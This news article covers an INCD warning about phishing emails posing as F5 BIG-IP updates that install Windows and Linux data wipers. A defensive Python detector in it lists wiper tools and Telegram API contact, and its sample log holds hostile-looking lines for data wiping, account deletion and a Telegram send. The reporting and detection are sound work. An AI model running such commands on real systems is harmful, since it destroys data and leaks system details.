
The Israel National Cyber Directorate warns of phishing emails pretending to be F5 BIG-IP zero-day security updates that deploy Windows and Linux data wipers.

Israel's National Cyber Directorate (INCD) acts as the CERT responsible for protecting the country from cyber threats and for warning organizations and citizens about known attacks.

Since October, Israel has been heavily targeted by pro-Palestinian and Iranian hacktivists, who have been conducting data theft and data-wiping attacks on organizations in the country.

In November, a new data wiper called BiBi Wiper was discovered that targeted both Linux and Windows devices and is believed to have been created by pro-Hamas hacktivists.

Fake F5 update deploys wiper

Yesterday, INCD warned of a new phishing attack deploying data wipers through emails pretending to be a warning about a zero-day vulnerability in F5 BIG-IP devices.

A pro-Palestinian hacktivist group named Handala told BleepingComputer that they were responsible for the phishing attack, stating it was deployed on numerous Israeli networks. BleepingComputer has not been able to confirm these claims independently.

The phishing email warns that the F5 BIG-IP zero-day vulnerability is actively exploited in attacks, urging Israeli organizations to download and install a security update before their network is breached.

Phishing email pushing fake F5 BIG-IP update
Source: INCD

For Windows users, the email pushes an executable named F5UPDATER.exe [VirusTotal], and for Linux, the file is a shell script named update.sh [VirusTotal].

When launched, both the Windows and Linux versions attempt to impersonate an F5 security update by displaying the company's logo on the screen.

For example, the Windows wiper will display a small screen branded with the F5 logo that pretends to be a security update installer.

Windows data wiper impersonating F5 security update
Source: BleepingComputer

When the Update button is clicked, the wiper will send a message containing information about the system to a Telegram channel and attempt to wipe all the data from the computer.

However, in BleepingComputer's tests, the wiper is a bit buggy, not deleting all of the data on a computer.

The Linux wiper is a shell script that first downloads the programs necessary to wipe the computer, which are xfsprogs, wipe, and parted.

Linux wiper's data wiping routine
Source: BleepingComputer

These programs are used first to remove all users on the system and then use the 'wipe' command to delete the associated home directories.

The wiper will then attempt to delete all operating system files and the partitions on the Linux system. When done, the Linux computer is rebooted to cause the partition changes to go into effect.

Like the Windows wiper, the Linux version will communicate with a Telegram channel to provide information about the system and status updates.
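For defenders, the Linux behavior described above (install the wiping tools, then immediately use them, alongside Telegram traffic) can be expressed as a simple correlation over process-execution logs. The following is an added example, not code from INCD or BleepingComputer; the log format, the sample lines, the package-manager list, and the account-removal tool names are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Tools the article says the Linux wiper script downloads before wiping.
WIPER_TOOLS = {"xfsprogs", "wipe", "parted"}
INSTALLERS = {"apt", "apt-get", "yum", "dnf", "zypper"}  # assumption: common package managers
USER_REMOVAL = {"userdel", "deluser"}                    # assumption: standard account-removal tools
TELEGRAM = re.compile(r"\bapi\.telegram\.org\b", re.I)

# Constructed sample exec log, one "<session> <command line>" per line (format is an assumption).
SAMPLE_LOG = """\
s1 apt-get install -y nginx
s1 systemctl restart nginx
s2 bash ./update.sh
s2 apt-get install -y xfsprogs wipe parted
s2 curl -s https://api.telegram.org/botPLACEHOLDER/sendMessage
s2 userdel demo
s2 wipe /home/demo
s2 parted /dev/sdX
s3 parted -l
"""

def triage(log_text):
    """Return {session: indicators} for sessions that install >=2 wiper tools and then run one."""
    state = defaultdict(lambda: {"staged": set(), "hits": set()})
    for line in log_text.splitlines():
        session, _, cmdline = line.partition(" ")
        argv = cmdline.split()
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]          # strip any leading path
        st = state[session]
        if prog in INSTALLERS and "install" in argv:
            st["staged"] |= WIPER_TOOLS & set(argv)
        elif prog in {"wipe", "parted"} and prog in st["staged"]:
            st["hits"].add(f"ran freshly installed {prog}")
        elif prog in USER_REMOVAL:
            st["hits"].add("account removal")
        if TELEGRAM.search(cmdline):
            st["hits"].add("telegram api contact")
    # Alert only when tools were staged AND then used; a lone `parted -l` stays quiet.
    return {s: sorted(st["hits"]) for s, st in state.items()
            if len(st["staged"]) >= 2 and any(h.startswith("ran ") for h in st["hits"])}

if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```

Requiring the install-then-run ordering within one session keeps routine use of parted by administrators from raising an alert.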

Data wipers have become a massive problem for Israel, with hacktivists commonly using them in destructive attacks to disrupt Israel's operations and economy.

As always, the best defense is to download files from email only if they come from a trusted and confirmed source. Furthermore, security updates should only be downloaded directly from a hardware vendor, not third-party sites.
